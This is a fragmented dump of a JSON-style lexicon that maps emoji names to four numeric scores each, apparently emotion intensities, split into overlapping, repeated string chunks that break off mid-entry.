[0.22, 0.2, 0.257, 0.253], \":right_arrow_curving_down:\": [0.257, 0.276, 0.287, 0.245], \":roasted_sweet_potato:\":", "0.128, 0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\":", "[0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261,", "0.361], \":guitar:\": [0.14400000000000002, 0.125, 0.257, 0.304], \":pig_face:\": [0.179, 0.214, 0.165, 0.337], \":hamster_face:\": [0.215,", "0.16699999999999998, 0.10099999999999999, 0.311], \":club_suit:\": [0.188, 0.228, 0.128, 0.248], \":wavy_dash:\": [0.235, 0.287, 0.253, 0.268],", "0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997,", "[0.27, 0.263, 0.276, 0.215], \":calendar:\": [0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128,", "0.23600000000000002, 0.20800000000000002, 0.23], \":man:\": [0.243, 0.131, 0.29100000000000004, 0.098], \":ghost:\": [0.147, 0.201, 0.017, 0.10800000000000001],", "[0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19, 0.309, 0.226, 0.249], \":nose:\": [0.38299999999999995, 0.272, 0.18600000000000003,", "[0.067, 0.073, 0.248, 0.247], \":mount_fuji:\": [0.196, 0.225, 0.253, 0.172], \":play_button:\": [0.168, 0.284, 0.17,", "0.20800000000000002], \":jack-o-lantern:\": [0.129, 0.327, 0.09, 0.092], \":wind_chime:\": [0.214, 0.17600000000000002, 0.271, 0.166], \":open_hands:\": [0.203,", "0.175, 0.29, 0.16], \":dashing_away:\": [0.363, 0.18, 0.102, 0.16399999999999998], \":Virgo:\": [0.17, 0.109, 0.264, 0.195],", "0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\": [0.213, 0.055, 0.081, 0.193], \":up-left_arrow:\": [0.193,", "0.109, 0.149, 0.11], \":incoming_envelope:\": [0.24, 0.196, 0.168, 0.248], \":hot_beverage:\": [0.142, 0.2, 0.317, 0.106],", "0.18600000000000003, 0.21899999999999997, 0.139], \":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003],", "0.184, 0.188, 0.12], \":Leo:\": [0.24100000000000002, 0.221, 0.212, 0.24100000000000002], \":Japanese_congratulations_button:\": [0.158, 0.162, 0.255, 0.19899999999999998],", "[0.174, 0.21, 0.131, 0.225], \":frowning_face_with_open_mouth:\": [0.37, 0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154,", "0.191, 0.165], \":bell:\": [0.27, 0.21899999999999997, 0.242, 0.42700000000000005], \":seven_o’clock:\": [0.15, 0.35, 0.08900000000000001, 0.33], \":smiling_face_with_horns:\":", "0.225, 0.159], \":open_book:\": [0.196, 0.207, 0.259, 0.243], \":clockwise_vertical_arrows:\": [0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\":", "0.231, 0.19899999999999998, 0.18], \":man_with_Chinese_cap:\": [0.255, 0.262, 0.126, 0.17600000000000002], \":kiss:\": [0.188, 0.122, 0.358, 0.22699999999999998],", "\":hundred_points:\": [0.254, 0.147, 0.145, 0.12300000000000001], \":tear-off_calendar:\": [0.139, 0.267, 0.095, 0.299], \":closed_mailbox_with_raised_flag:\": [0.191, 0.10800000000000001,", "[0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374, 0.145,", "0.109, 0.264, 0.195], \":fallen_leaf:\": [0.133, 0.16699999999999998, 0.28600000000000003, 0.168], \":top_hat:\": [0.172, 0.214, 0.11199999999999999, 0.207],", "0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29], \":musical_score:\": [0.149, 0.09, 0.371, 0.315],", "0.159], \":french_fries:\": [0.16399999999999998, 0.154, 0.14, 0.177], \":soft_ice_cream:\": [0.156, 0.18100000000000002, 0.141, 0.09], \":Japanese_post_office:\": [0.19,", "0.245, 0.192, 0.034], \":gem_stone:\": [0.17300000000000001, 0.073, 0.5429999999999999, 0.10800000000000001], \":purple_heart:\": [0.183, 0.131, 0.341, 0.207],", "[0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3, 0.179], \":pool_8_ball:\": [0.257, 0.09, 0.059000000000000004,", "0.059000000000000004, 0.204], \":no_entry:\": [0.312, 0.445, 0.136, 0.344], \":water_wave:\": [0.106, 0.29, 0.12300000000000001, 0.222], \":horse:\":", "[0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102,", "0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098, 0.23399999999999999, 0.19899999999999998, 0.086], \":ring:\": [0.171, 0.073, 0.46, 0.17300000000000001],", "0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131], \":part_alternation_mark:\":", "0.19399999999999998], \":woman’s_boot:\": [0.221, 0.095, 0.127, 0.239], \":syringe:\": [0.21, 0.245, 0.142, 0.124], \":dotted_six-pointed_star:\": [0.249,", "0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004], \":octopus:\": [0.098,", "0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196, 0.317, 0.28600000000000003], \":sailboat:\": [0.10400000000000001, 0.225, 0.142, 0.205], \":horse_face:\":", "[0.175, 0.245, 0.37, 0.188], \":snake:\": [0.37, 0.35200000000000004, 0.16899999999999998, 0.166], \":floppy_disk:\": [0.168, 0.324, 0.341,", "0.037000000000000005], \":pensive_face:\": [0.261, 0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228,", "\":dotted_six-pointed_star:\": [0.249, 0.161, 0.34299999999999997, 0.282], \":globe_showing_Asia-Australia:\": [0.163, 0.242, 0.261, 0.188], \":melon:\": [0.282, 0.313,", "0.159, 0.086, 0.245], \":ogre:\": [0.37, 0.419, 0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215],", "0.221], \":mouth:\": [0.245, 0.136, 0.321, 0.121], \":frog_face:\": [0.408, 0.29100000000000004, 0.19699999999999998, 0.16699999999999998], \":flashlight:\": [0.07400000000000001,", "0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002, 0.16], \":man_and_woman_holding_hands:\": [0.075, 0.096, 0.266, 0.131],", "[0.259, 0.142, 0.46, 0.299], \":downwards_button:\": [0.195, 0.258, 0.182, 0.225], \":twelve_o’clock:\": [0.18600000000000003, 0.34700000000000003, 0.165,", "[0.115, 0.271, 0.336, 0.17], \":grinning_cat_face:\": [0.149, 0.192, 0.145, 0.25], \":hourglass_not_done:\": [0.19699999999999998, 0.31, 0.266,", "[0.149, 0.09, 0.371, 0.315], \":white_square_button:\": [0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001,", "0.40399999999999997, 0.145, 0.313], \":anchor:\": [0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114],", "0.204, 0.162], \":baby_chick:\": [0.156, 0.23800000000000002, 0.125, 0.057], \":snail:\": [0.162, 0.239, 0.19899999999999998, 0.17], \":cat_face:\":", "0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\": [0.15, 0.36700000000000005, 0.19699999999999998, 0.331], \":rice_ball:\":", "0.19699999999999998, 0.16699999999999998], \":panda_face:\": [0.069, 0.23199999999999998, 0.091, 0.153], \":four_o’clock:\": [0.165, 0.361, 0.171, 0.282], \":jeans:\":", "\":person_getting_haircut:\": [0.237, 0.215, 0.266, 0.153], \":Cancer:\": [0.209, 0.21899999999999997, 0.201, 0.255], \":expressionless_face:\": [0.415, 0.308,", "0.217, 0.158, 0.205], \":megaphone:\": [0.239, 0.214, 0.16699999999999998, 0.22], \":bug:\": [0.268, 0.27, 0.174, 0.102],", "\":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002, 0.122, 0.315], \":cityscape_at_dusk:\": [0.053, 0.24,", "0.371], \":bar_chart:\": [0.213, 0.255, 0.41, 0.228], \":locked_with_key:\": [0.20600000000000002, 0.095, 0.28, 0.16], \":ten_o’clock:\": [0.141,", "[0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191, 0.302], \":cooking:\": [0.078, 0.221, 0.139,", "\":electric_plug:\": [0.124, 0.14, 0.078, 0.139], \":cloud:\": [0.18, 0.231, 0.266, 0.295], \":watch:\": [0.183, 0.276,", "\":worried_face:\": [0.349, 0.397, 0.09699999999999999, 0.348], \":foggy:\": [0.162, 0.301, 0.317, 0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251,", "[0.17600000000000002, 0.155, 0.179, 0.17600000000000002], \":koala:\": [0.11900000000000001, 0.217, 0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998,", "[0.111, 0.235, 0.225, 0.163], \":ribbon:\": [0.20199999999999999, 0.203, 0.345, 0.193], \":link:\": [0.258, 0.217, 0.179,", "0.335], \":hushed_face:\": [0.314, 0.355, 0.13699999999999998, 0.353], \":umbrella_with_rain_drops:\": [0.184, 0.242, 0.254, 0.37], \":herb:\": [0.152,", "0.294, 0.23600000000000002], \":blue_book:\": [0.156, 0.191, 0.149, 0.193], \":headphone:\": [0.16699999999999998, 0.14800000000000002, 0.266, 0.316], \":crown:\":", "\":bug:\": [0.268, 0.27, 0.174, 0.102], \":blowfish:\": [0.21, 0.214, 0.155, 0.138], \":bear_face:\": [0.205, 0.256,", "0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248], \":cat_face_with_tears_of_joy:\": [0.43799999999999994, 0.17800000000000002, 0.11599999999999999, 0.282], \":crescent_moon:\":", "\":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254, 0.166], \":fast_reverse_button:\": [0.301, 0.233,", "0.242], \":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22,", "0.201], \":sheaf_of_rice:\": [0.188, 0.259, 0.38299999999999995, 0.215], \":graduation_cap:\": [0.162, 0.10300000000000001, 0.392, 0.126], \":inbox_tray:\": [0.205,", "[0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002, 0.278], \":Statue_of_Liberty:\": [0.09, 0.226, 0.113,", "0.28300000000000003], \":turtle:\": [0.10800000000000001, 0.251, 0.239, 0.08], \":Tokyo_tower:\": [0.115, 0.092, 0.168, 0.24], \":money_with_wings:\": [0.12300000000000001,", "[0.251, 0.182, 0.195, 0.121], \":pistol:\": [0.259, 0.38799999999999996, 0.081, 0.128], \":Japanese_secret_button:\": [0.19699999999999998, 0.2, 0.221,", "0.17600000000000002, 0.3], \":left_arrow:\": [0.282, 0.221, 0.126, 0.19899999999999998], \":princess:\": [0.39799999999999996, 0.198, 0.337, 0.175], \":key:\":", "[0.442, 0.465, 0.13699999999999998, 0.47100000000000003], \":person_tipping_hand:\": [0.361, 0.099, 0.19699999999999998, 0.11199999999999999], \":down-right_arrow:\": [0.23, 0.242, 0.10300000000000001,", "\":person_raising_hand:\": [0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139,", "[0.083, 0.14, 0.027000000000000003, 0.14300000000000002], \":books:\": [0.16699999999999998, 0.157, 0.35100000000000003, 0.141], \":milky_way:\": [0.16699999999999998, 0.201, 0.43700000000000006,", "0.264], \":Ophiuchus:\": [0.213, 0.17, 0.233, 0.228], \":elephant:\": [0.22399999999999998, 0.23399999999999999, 0.163, 0.156], \":yen_banknote:\": [0.217,", "0.261, 0.188], \":melon:\": [0.282, 0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\":", "0.406], \":telephone:\": [0.257, 0.204, 0.221, 0.267], \":trophy:\": [0.131, 0.19399999999999998, 0.10099999999999999, 0.27399999999999997], \":american_football:\": [0.185,", "0.389, 0.08800000000000001, 0.332], \":house:\": [0.13699999999999998, 0.27399999999999997, 0.18600000000000003, 0.235], \":peach:\": [0.344, 0.204, 0.128, 0.11900000000000001],", "\":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198], \":kissing_cat_face:\": [0.18899999999999997, 0.11900000000000001, 0.215, 0.21], \":backhand_index_pointing_down:\": [0.39299999999999996, 0.196,", "0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235, 0.299, 0.326, 0.27899999999999997], \":optical_disk:\": [0.22, 0.165, 0.332, 0.261],", "0.149, 0.177, 0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239],", "0.193], \":two_o’clock:\": [0.122, 0.35, 0.191, 0.298], \":Pisces:\": [0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147,", "0.109, 0.257], \":chart_increasing:\": [0.22399999999999998, 0.259, 0.42700000000000005, 0.215], \":pouting_face:\": [0.46799999999999997, 0.36200000000000004, 0.07400000000000001, 0.401], \":fish_cake_with_swirl:\":", "\":five_o’clock:\": [0.126, 0.335, 0.21, 0.264], \":unamused_face:\": [0.418, 0.297, 0.11900000000000001, 0.33299999999999996], \":bouquet:\": [0.09, 0.251,", "0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188], \":white_circle:\": [0.22, 0.16399999999999998, 0.121, 0.217], \":old_woman:\": [0.235,", "0.11599999999999999, 0.109], \":paperclip:\": [0.289, 0.21899999999999997, 0.19399999999999998, 0.231], \":outbox_tray:\": [0.204, 0.22899999999999998, 0.19699999999999998, 0.19399999999999998], \":woman’s_boot:\":", "\":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002,", "[0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268, 0.142, 0.252], \":snowboarder:\": [0.13699999999999998, 0.132, 0.028999999999999998,", "0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175, 0.17, 0.281, 0.151], \":ON!_arrow:\":", "0.048, 0.039, 0.207], \":input_latin_uppercase:\": [0.182, 0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125],", "\":warning:\": [0.264, 0.293, 0.107, 0.212], \":shortcake:\": [0.126, 0.196, 0.166, 0.08900000000000001], \":dragon_face:\": [0.198, 0.298,", "0.214, 0.335], \":smiling_cat_face_with_heart-eyes:\": [0.304, 0.1, 0.319, 0.145], \":clapper_board:\": [0.213, 0.196, 0.237, 0.162], \":first_quarter_moon_face:\":", "0.128], \":triangular_ruler:\": [0.198, 0.201, 0.284, 0.168], \":three_o’clock:\": [0.16699999999999998, 0.369, 0.209, 0.282], \":sunflower:\": [0.203,", "0.054000000000000006], \":doughnut:\": [0.152, 0.259, 0.136, 0.15], \":fire:\": [0.306, 0.225, 0.10300000000000001, 0.179], \":oden:\": [0.12300000000000001,", "0.17300000000000001], \":tent:\": [0.105, 0.18899999999999997, 0.247, 0.151], \":pineapple:\": [0.11699999999999999, 0.19399999999999998, 0.133, 0.12300000000000001], \":construction_worker:\": [0.204,", "0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099], \":nine_o’clock:\":", "\":blond-haired_person:\": [0.257, 0.23, 0.226, 0.166], \":love_letter:\": [0.13, 0.15, 0.331, 0.142], \":bomb:\": [0.22, 0.196,", "0.282], \":jeans:\": [0.2, 0.109, 0.134, 0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174,", "0.21, 0.163, 0.179], \":postbox:\": [0.26899999999999996, 0.171, 0.21899999999999997, 0.175], \":one_o’clock:\": [0.14400000000000002, 0.341, 0.209, 0.198],", "\":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231], \":tropical_fish:\": [0.063, 0.271,", "\":credit_card:\": [0.14400000000000002, 0.08900000000000001, 0.24100000000000002, 0.213], \":video_camera:\": [0.301, 0.29, 0.235, 0.20199999999999999], \":green_apple:\": [0.16, 0.188,", "[0.068, 0.084, 0.08, 0.156], \":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155,", "0.39299999999999996, 0.16899999999999998, 0.326], \":astonished_face:\": [0.348, 0.41100000000000003, 0.138, 0.327], \":grinning_squinting_face:\": [0.165, 0.21600000000000003, 0.11900000000000001, 0.188],", "0.209], \":blossom:\": [0.20199999999999999, 0.299, 0.314, 0.242], \":fishing_pole:\": [0.174, 0.14800000000000002, 0.075, 0.128], \":triangular_ruler:\": [0.198,", "[0.25, 0.313, 0.337, 0.13699999999999998], \":hear-no-evil_monkey:\": [0.303, 0.27699999999999997, 0.094, 0.28300000000000003], \":circus_tent:\": [0.113, 0.196, 0.111,", "[0.264, 0.261, 0.23800000000000002, 0.295], \":yellow_heart:\": [0.158, 0.177, 0.27, 0.262], \":Gemini:\": [0.228, 0.132, 0.262,", "0.17800000000000002, 0.17600000000000002, 0.17600000000000002], \":bird:\": [0.22, 0.243, 0.213, 0.142], \":clutch_bag:\": [0.12300000000000001, 0.17, 0.253, 0.31],", "0.028999999999999998, 0.20600000000000002], \":collision:\": [0.16899999999999998, 0.16399999999999998, 0.048, 0.2], \":locked_with_pen:\": [0.168, 0.138, 0.19899999999999998, 0.12300000000000001], \":tired_face:\":", "\":smiling_face_with_sunglasses:\": [0.036000000000000004, 0.092, 0.026000000000000002, 0.09300000000000001], \":white_small_square:\": [0.276, 0.22699999999999998, 0.125, 0.161], \":heavy_large_circle:\": [0.154, 0.17800000000000002,", "[0.35100000000000003, 0.226, 0.225, 0.16699999999999998], \":angry_face:\": [0.493, 0.375, 0.07400000000000001, 0.44299999999999995], \":Aquarius:\": [0.17800000000000002, 0.306, 0.23199999999999998,", "0.326, 0.18100000000000002], \":page_facing_up:\": [0.196, 0.31, 0.3, 0.29], \":notebook:\": [0.128, 0.14400000000000002, 0.281, 0.174], \":black_square_button:\":", "0.187, 0.32799999999999996, 0.22899999999999998], \":face_with_tongue:\": [0.242, 0.19, 0.142, 0.14], \":hospital:\": [0.128, 0.376, 0.305, 0.184],", "0.18600000000000003, 0.52], \":closed_book:\": [0.19899999999999998, 0.162, 0.256, 0.16], \":basketball:\": [0.171, 0.209, 0.11800000000000001, 0.39799999999999996], \":pig_nose:\":", "0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121, 0.081, 0.237, 0.29],", "0.21100000000000002], \":cooked_rice:\": [0.203, 0.126, 0.222, 0.289], \":saxophone:\": [0.107, 0.16, 0.244, 0.21600000000000003], \":raising_hands:\": [0.122,", "0.272], \":glowing_star:\": [0.191, 0.215, 0.38, 0.134], \":person_swimming:\": [0.175, 0.159, 0.086, 0.245], \":ogre:\": [0.37,", "0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\":", "0.196, 0.163, 0.205], \":direct_hit:\": [0.177, 0.213, 0.098, 0.09], \":anger_symbol:\": [0.316, 0.20800000000000002, 0.036000000000000004, 0.289],", "0.293, 0.302, 0.239], \":crystal_ball:\": [0.16899999999999998, 0.22, 0.354, 0.196], \":moon_viewing_ceremony:\": [0.149, 0.14300000000000002, 0.43700000000000006, 0.231],", "[0.22, 0.179, 0.245, 0.243], \":ice_cream:\": [0.228, 0.18899999999999997, 0.23199999999999998, 0.114], \":bento_box:\": [0.136, 0.16, 0.159,", "0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002, 0.215, 0.14400000000000002], \":information:\": [0.17800000000000002, 0.259, 0.264, 0.284], \":flower_playing_cards:\":", "0.151], \":barber_pole:\": [0.135, 0.163, 0.174, 0.18], \":backhand_index_pointing_left:\": [0.19899999999999998, 0.262, 0.226, 0.251], \":input_numbers:\": [0.174,", "[0.16899999999999998, 0.17600000000000002, 0.233, 0.239], \":soccer_ball:\": [0.147, 0.332, 0.115, 0.41100000000000003], \":Santa_Claus:\": [0.131, 0.226, 0.254,", "0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146], \":pushpin:\": [0.299, 0.263, 0.136, 0.177], \":anguished_face:\": [0.309,", "0.313, 0.262, 0.077], \":strawberry:\": [0.153, 0.198, 0.19699999999999998, 0.10400000000000001], \":droplet:\": [0.19899999999999998, 0.223, 0.203, 0.248],", "\":seat:\": [0.155, 0.24, 0.067, 0.13699999999999998], \":reverse_button:\": [0.256, 0.262, 0.114, 0.29600000000000004], \":heart_suit:\": [0.165, 0.12300000000000001,", "\":sweat_droplets:\": [0.26, 0.11900000000000001, 0.081, 0.16899999999999998], \":cherries:\": [0.171, 0.139, 0.155, 0.087], \":electric_plug:\": [0.124, 0.14,", "[0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278], \":OK_hand:\": [0.153, 0.21, 0.20600000000000002,", "0.141, 0.196, 0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34],", "0.136, 0.133], \":videocassette:\": [0.213, 0.25, 0.312, 0.20800000000000002], \":eight_o’clock:\": [0.11800000000000001, 0.341, 0.222, 0.24600000000000002], \":night_with_stars:\":", "0.218, 0.127], \":sparkling_heart:\": [0.217, 0.068, 0.42200000000000004, 0.163], \":heart_with_arrow:\": [0.22, 0.07400000000000001, 0.373, 0.10099999999999999], \":dizzy_face:\":", "\":anguished_face:\": [0.309, 0.485, 0.14, 0.369], \":flushed_face:\": [0.281, 0.263, 0.102, 0.231], \":person_frowning:\": [0.34600000000000003, 0.374,", "0.276, 0.287, 0.245], \":roasted_sweet_potato:\": [0.191, 0.21899999999999997, 0.25, 0.121], \":crossed_flags:\": [0.114, 0.048, 0.039, 0.207],", "0.182], \":shooting_star:\": [0.17600000000000002, 0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001,", "0.212], \":hammer:\": [0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327,", "0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207, 0.317, 0.261], \":microphone:\": [0.121,", "[0.053, 0.078, 0.126, 0.285], \":pile_of_poo:\": [0.35, 0.342, 0.151, 0.446], \":large_blue_diamond:\": [0.249, 0.053, 0.23600000000000002,", "[0.375, 0.161, 0.138, 0.185], \":ear_of_corn:\": [0.141, 0.156, 0.182, 0.16699999999999998], \":pot_of_food:\": [0.18, 0.149, 0.177,", "\":open_hands:\": [0.203, 0.18899999999999997, 0.16699999999999998, 0.23], \":flexed_biceps:\": [0.225, 0.251, 0.231, 0.204], \":down_arrow:\": [0.33899999999999997, 0.268,", "[0.22899999999999998, 0.23399999999999999, 0.23, 0.262], \":green_book:\": [0.154, 0.24, 0.391, 0.107], \":SOON_arrow:\": [0.12300000000000001, 0.179, 0.191,", "0.09, 0.159], \":crying_face:\": [0.284, 0.385, 0.21, 0.33299999999999996], \":hourglass_done:\": [0.205, 0.305, 0.25, 0.266], \":movie_camera:\":", "0.165, 0.349], \":kimono:\": [0.14400000000000002, 0.196, 0.23800000000000002, 0.222], \":broken_heart:\": [0.244, 0.34, 0.19899999999999998, 0.332], \":see-no-evil_monkey:\":", "0.175, 0.161, 0.182], \":kitchen_knife:\": [0.321, 0.449, 0.075, 0.125], \":straight_ruler:\": [0.249, 0.20600000000000002, 0.215, 0.155],", "0.423, 0.128, 0.355], \":alarm_clock:\": [0.17600000000000002, 0.28, 0.154, 0.22699999999999998], \":wine_glass:\": [0.046, 0.124, 0.218, 0.059000000000000004],", "0.078, 0.32299999999999995, 0.157], \":grinning_face:\": [0.163, 0.17300000000000001, 0.171, 0.18600000000000003], \":girl:\": [0.22699999999999998, 0.16, 0.214, 0.146],", "0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322,", "0.218, 0.049, 0.063], \":mobile_phone_with_arrow:\": [0.098, 0.142, 0.156, 0.20600000000000002], \":black_small_square:\": [0.319, 0.249, 0.141, 0.22699999999999998],", "0.16699999999999998, 0.226], \":factory:\": [0.205, 0.306, 0.24600000000000002, 0.21], \":disappointed_face:\": [0.318, 0.467, 0.131, 0.39399999999999996], \":fireworks:\":", "0.165, 0.073, 0.275], \":oncoming_fist:\": [0.23600000000000002, 0.253, 0.13, 0.273], \":nail_polish:\": [0.418, 0.121, 0.314, 0.099],", "\":blue_circle:\": [0.203, 0.24100000000000002, 0.11699999999999999, 0.336], \":face_with_tears_of_joy:\": [0.381, 0.231, 0.099, 0.326], \":neutral_face:\": [0.415, 0.309,", "[0.19699999999999998, 0.31, 0.266, 0.25], \":sun_behind_cloud:\": [0.11199999999999999, 0.27899999999999997, 0.345, 0.252], \":balloon:\": [0.042, 0.128, 0.102,", "\":closed_mailbox_with_lowered_flag:\": [0.184, 0.19, 0.109, 0.18100000000000002], \":sleepy_face:\": [0.267, 0.375, 0.205, 0.36700000000000005], \":rainbow:\": [0.183, 0.207,", "0.166], \":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 0.126, 0.256, 0.138], \":woman’s_hat:\": [0.175,", "0.467, 0.131, 0.39399999999999996], \":fireworks:\": [0.051, 0.165, 0.191, 0.165], \":tongue:\": [0.316, 0.062, 0.136, 0.133],", "\":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29], \":television:\": [0.322, 0.247, 0.22699999999999998, 0.222], \":face_blowing_a_kiss:\": [0.233, 0.022000000000000002,", "0.205], \":horse_face:\": [0.254, 0.16399999999999998, 0.078, 0.159], \":left_arrow_curving_right:\": [0.138, 0.275, 0.228, 0.22899999999999998], \":palm_tree:\": [0.035,", "[0.09, 0.226, 0.113, 0.18600000000000003], \":black_medium_square:\": [0.445, 0.245, 0.21, 0.264], \":Capricorn:\": [0.196, 0.172, 0.3,", "0.531, 0.172, 0.433], \":loudspeaker:\": [0.271, 0.19899999999999998, 0.15, 0.21600000000000003], \":convenience_store:\": [0.191, 0.17800000000000002, 0.17600000000000002, 0.17600000000000002],", "0.16, 0.377, 0.2], \":seedling:\": [0.223, 0.289, 0.503, 0.16899999999999998], \":snowman_without_snow:\": [0.11900000000000001, 0.203, 0.128, 0.278],", "0.121], \":weary_face:\": [0.23600000000000002, 0.27399999999999997, 0.18600000000000003, 0.23399999999999999], \":recycling_symbol:\": [0.261, 0.271, 0.33399999999999996, 0.152], \":full_moon:\": [0.17600000000000002,", "0.212, 0.284, 0.196], \":meat_on_bone:\": [0.177, 0.218, 0.213, 0.106], \":round_pushpin:\": [0.16399999999999998, 0.26899999999999996, 0.14800000000000002, 0.29],", "[0.305, 0.22699999999999998, 0.126, 0.187], \":white_large_square:\": [0.348, 0.19399999999999998, 0.155, 0.22899999999999998], \":sparkler:\": [0.10300000000000001, 0.209, 0.221,", "0.247], \":briefcase:\": [0.17300000000000001, 0.192, 0.28600000000000003, 0.175], \":musical_notes:\": [0.149, 0.131, 0.326, 0.31], \":open_file_folder:\": [0.213,", "0.297, 0.062, 0.2], \":fast_down_button:\": [0.287, 0.247, 0.22, 0.22399999999999998], \":grapes:\": [0.17600000000000002, 0.155, 0.179, 0.17600000000000002],", "[0.33299999999999996, 0.42700000000000005, 0.221, 0.18600000000000003], \":confused_face:\": [0.331, 0.34299999999999997, 0.105, 0.34], \":fast-forward_button:\": [0.327, 0.322, 0.17,", "0.146, 0.245], \":up-down_arrow:\": [0.27399999999999997, 0.27699999999999997, 0.207, 0.276], \":fried_shrimp:\": [0.138, 0.15, 0.191, 0.165], \":bell:\":", "\":angry_face_with_horns:\": [0.385, 0.257, 0.03, 0.21100000000000002], \":kissing_face_with_smiling_eyes:\": [0.203, 